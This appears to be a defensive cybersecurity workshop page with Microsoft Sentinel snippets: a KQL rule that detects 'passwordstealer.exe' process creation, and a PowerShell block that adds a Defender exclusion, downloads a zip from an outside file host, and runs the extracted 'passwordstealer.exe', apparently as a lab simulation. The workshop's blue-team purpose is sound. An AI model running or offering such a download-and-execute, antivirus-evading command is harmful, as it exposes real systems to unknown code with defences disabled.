Detection Rule (Slide 6.5)
Event | where EventID == 4688 | where EventData contains "passwordstealer.exe" | project TimeGenerated, Computer, EventID, RenderedDescription
Welcome to the Defensive Cybersecurity Workshop, a hands-on cybersecurity workshop where students deploy their own cloud-based security infrastructure using Microsoft Azure and Microsoft Sentinel. This immersive experience lays the foundations for real-world blue team skills in detection, investigation, and response to modern cyber threats.
View the full slide deck below or open it in a new tab to copy text and explore in detail.
Below are the key snippets needed for the workshop.
Event | where EventID == 4688 | where EventData contains "passwordstealer.exe" | project TimeGenerated, Computer, EventID, RenderedDescription
$zipUrl = "https://files.catbox.moe/yjkxr7.zip" $zipPath = "$env:TEMP\passwordstealer.zip" $extractPath = "$env:TEMP\passwordstealer_final" Add-MpPreference -ExclusionPath $extractPath Invoke-WebRequest -Uri $zipUrl -OutFile $zipPath Expand-Archive -Path $zipPath -DestinationPath $extractPath -Force
Start-Process "$extractPath\passwordstealer.exe"